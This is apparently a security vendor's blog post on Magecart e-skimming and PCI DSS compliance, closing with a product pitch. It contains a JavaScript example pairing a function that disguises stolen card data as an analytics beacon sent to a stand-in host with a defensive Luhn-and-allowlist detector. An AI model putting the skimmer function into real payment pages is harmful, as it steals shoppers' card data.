Protect Your Holiday Revenue from E-Skimming Attacks
We’re entering the peak of the holiday season. For e-commerce sites, it’s not just the busiest time of the year but also the most profitable, with many relying on these few weeks for up to 26% of their annual revenue.
But the higher transaction volume also widens the attack surface, with online retailers reporting that cyberattacks increase by around 30% during the holidays.
As you deck the digital halls with cheer and discounts, you’ll also want to fortify the defences of your online payment pages. It’s not just about stopping hackers, but protecting that hard-earned trust and brand reputation you’ve built with your customers.
The High Costs of e-Skimming Attacks
A cyberattack can financially hit you in at least three ways: downtime, reputational damage, and fines/penalties for non-compliance with key standards, like PCI DSS.
Downtime
According to an ITIC study, downtime resulting from a cyberattack can cost businesses around $8,000 to $20,000 per hour. These costs come from a range of factors, including direct losses when customers cannot complete their transactions, operational disruption, and recovery after the attack. In fact, recovering from a cybersecurity incident costs an average of $653,587.
Reputational Damage
Whether it’s downtime, a data breach, or some other type of cyberattack, the resulting damage to your reputation can also be costly. For example, a Ping study found that 78% of consumers will stop engaging with a brand online if that brand experienced an attack. Over one-third would stop buying from that brand altogether following a breach. Worse, 85% of consumers would also share their negative experiences resulting from a breach with others.
Non-Compliance Penalties
Finally, a cyberattack can also lead to hefty non-compliance fees and/or legal fines. The actual cost can vary depending on the type of attack and the resulting problems (such as lawsuits and settlements). However, as the high-profile breaches at Target, British Airways, and others show, these costs can amount to potentially millions of dollars.
Taken together, these three factors can leave you with a hefty bill at the end of a cyberattack. According to an IBM study, the total cost averages around $4.88 million across lost sales from downtime, reputational loss, and non-compliance penalties.
When your goal this holiday is a big revenue bump, the last thing you want is for that momentum to be sunk by a costly cyberattack that turns your best weeks of the year into a loss.
Common Cybersecurity Threats During the Holidays
Online stores are designed to be as user-friendly and accessible as possible. Not only that, but they’re loaded with plugins and tools built for measuring traffic, tracking how users interact with pages, and driving people to make purchases.
Sadly, while all of these elements are great (and necessary) for driving sales, they also create a lot of potential gaps for bad actors to attack.
There are a few notable types of attacks, such as distributed denial-of-service (DDoS), phishing, and bad bot attacks. But there’s one that can go unnoticed and cause both short- and long-term problems: e-commerce card skimming (or e-skimming for short).
Like physical card skimming, e-skimming aims to steal customer payment card data, but through online storefronts, particularly checkout and payment pages. The best-known family of e-skimming attacks is Magecart, which has struck British Airways, Ticketmaster, Newegg, and other major merchants.
Magecart attacks typically involve three main steps:
First, the attacker gains access to an e-commerce website through a vulnerability, either in the website’s own infrastructure or in a third-party plugin or tool the site loads.
Second, the attacker injects malicious JavaScript into the payment page, either directly or through the compromised third-party script. The browser runs every script on the page with the same access to the page’s DOM and form fields, so the injected code runs in the customer’s browser right alongside your legitimate code.
Third, as the customer fills in and submits the checkout form, the malicious code ‘skims’ the card number, expiry date, CVV and billing details and sends them to a server the attacker controls.
These attacks often go unnoticed by both the merchant and the customer.
To the customer, the compromised environment largely looks and feels legitimate. Transactions complete normally with no visible signs of tampering.
As for merchants, the payment still goes through as normal while the skimmer copies the card data in parallel, so nothing in the order flow looks wrong. Some attackers disguise their code as a legitimate third-party service, such as an analytics plugin, and host it on a domain chosen to look like one. They also encode or encrypt the stolen data and send it in requests shaped like ordinary analytics or image beacons, which makes it hard for merchants to spot the exfiltration among the many legitimate third-party requests a payment page already makes.
Attackers may also skim only 1-2% of the transactions on a targeted page. During peak shopping periods like the holidays, the resulting fraud patterns among those customers can easily be mistaken for seasonal fluctuations, which is one more reason sophisticated e-skimming attacks are hard to detect.
So, how do Magecart attacks happen? Let’s say you use an analytics plugin to track customer traffic. To get this plugin to collect web traffic data, you’d add JavaScript code into the payment page. Now, imagine if an attacker compromises that analytics plugin and changes how that plugin works, perhaps by adding another script into your page.
Today, some 99% of websites use JavaScript, and the average e-commerce site loads dozens of third-party scripts. So even if your own website is secure in and of itself, your plugin vendors may not be as well protected, and a gap on their end is a gap on yours.
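To make the three steps above and the disguised exfiltration concrete, here is an added example. It is not code from the original post and is not taken from any real skimmer: the attacker-side function builds a beacon that carries the harvested card fields base64-encoded inside a parameter of what looks like an analytics pageview request, and the defender-side check decodes the parameters of outbound request URLs and flags any that contain a Luhn-valid card number or go to a host that is not on the page’s allowlist. The form values, the hostname analytics-cdn.example and the allowlist are constructed for the example; a real skimmer reads the fields from the DOM on submit rather than taking them as an argument.

```javascript
// Added example (not from the original post or any real skimmer): a skimmer-style
// beacon that hides card data in an analytics-looking request, and an egress check
// that flags such beacons. Hostnames, form values and the allowlist are constructed.

// --- Attacker side: what injected skimmer code does with the checkout form ---
// A real skimmer reads these values from the DOM on submit; here they are passed
// in so the logic runs stand-alone (URL and Buffer are Node globals).
function buildSkimBeacon(fields, exfilHost = 'analytics-cdn.example') {
  const stolen = {
    n: fields.cardNumber.replace(/\s+/g, ''),
    e: fields.expiry,
    c: fields.cvv,
    h: fields.cardholder,
  };
  // Base64 so no raw card number is visible in the URL or a proxy log.
  const blob = Buffer.from(JSON.stringify(stolen), 'utf8').toString('base64');
  // Shaped like a pageview beacon; the payload rides in the "client id" field.
  const u = new URL(`https://${exfilHost}/collect`);
  u.searchParams.set('v', '1');
  u.searchParams.set('t', 'pageview');
  u.searchParams.set('cid', blob);
  return u.toString();
}

// --- Defender side: inspect outbound request URLs (e.g. from a proxy log) ---
function luhnValid(digits) {
  let sum = 0;
  let dbl = false;
  for (let i = digits.length - 1; i >= 0; i--) {
    let d = digits.charCodeAt(i) - 48;
    if (dbl) { d *= 2; if (d > 9) d -= 9; }
    sum += d;
    dbl = !dbl;
  }
  return sum % 10 === 0;
}

// True if the text contains a 13-19 digit run that passes the Luhn check.
function containsPan(text) {
  const runs = text.replace(/[ -]/g, '').match(/\d{13,19}/g) || [];
  return runs.some(luhnValid);
}

// Look at the raw parameter value and, if it looks like base64, at the decoded value too.
function decodeCandidates(value) {
  const out = [value];
  if (/^[A-Za-z0-9+/]{16,}={0,2}$/.test(value)) {
    out.push(Buffer.from(value, 'base64').toString('utf8'));
  }
  return out;
}

function isSuspiciousBeacon(urlString, allowedHosts) {
  const u = new URL(urlString);
  const unknownHost = !allowedHosts.includes(u.hostname);
  let carriesPan = false;
  for (const [, value] of u.searchParams) {
    if (decodeCandidates(value).some(containsPan)) carriesPan = true;
  }
  return { unknownHost, carriesPan, flagged: unknownHost || carriesPan };
}

// Constructed sample data: a test card number and a plausible allowlist.
const SAMPLE_FORM = { cardNumber: '4111 1111 1111 1111', expiry: '12/27', cvv: '123', cardholder: 'Jane Doe' };
const ALLOWED_HOSTS = ['shop.example', 'www.google-analytics.com'];

const beacon = buildSkimBeacon(SAMPLE_FORM);
console.log(beacon);
console.log(isSuspiciousBeacon(beacon, ALLOWED_HOSTS));
console.log(isSuspiciousBeacon('https://www.google-analytics.com/collect?v=1&t=pageview&cid=555', ALLOWED_HOSTS));
```

Run this over the URLs a proxy or the browser’s own request records capture for the payment page. Two caveats: if the attacker compromised a vendor you already trust, the host is on the allowlist and only the content check fires; and real skimmers often use their own encryption or split the number across several parameters, which defeats a plain decode-and-Luhn check. Egress inspection is therefore a second line of defence; the first is controlling which scripts are allowed to run on the page at all.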
Keep the Festive Season Happy by Securing Your Web Assets
The holiday season is a key sales period for you, but the larger transaction volume also attracts bad actors and leads to more attacks. Each holiday shopping season, Zscaler sees a spike in e-skimming attacks, and the attacks are also getting more sophisticated: bad actors are increasingly going after third parties (like that analytics plugin) rather than the merchant’s own site.
While the threat landscape is tough, the good news is that you do have tools and processes to help secure your e-commerce website.
One of these measures, and arguably the most important one, is becoming compliant with PCI DSS v4.0. It sets out steps for inventorying and authorizing the scripts on your payment pages and for setting up mechanisms that detect unauthorized changes to them (learn more about those steps in our other blog).
To make implementing these policies easier and, more importantly, properly protecting yourself in both today’s and tomorrow’s threat environment, you also need the right tools.
Look for something that monitors your payment pages around the clock and blocks malicious code from executing. Make sure it is also something an attacker cannot modify or circumvent: a control that runs only as another script on the page is itself within reach of injected code. The right investment here can protect you from costly issues later.
DataStealth’s Tamper Detection and Protection (TDP) solution provides real-time coverage of your payment pages. TDP ensures that only the scripts you authorized for use will load, while preventing unauthorized scripts from executing. Moreover, TDP helps you meet and exceed PCI DSS v4.0’s requirements 6.4.3 and 11.6.1, thereby making compliance easier.
Book a demo to see TDP in action and how it could help fortify your e-commerce website.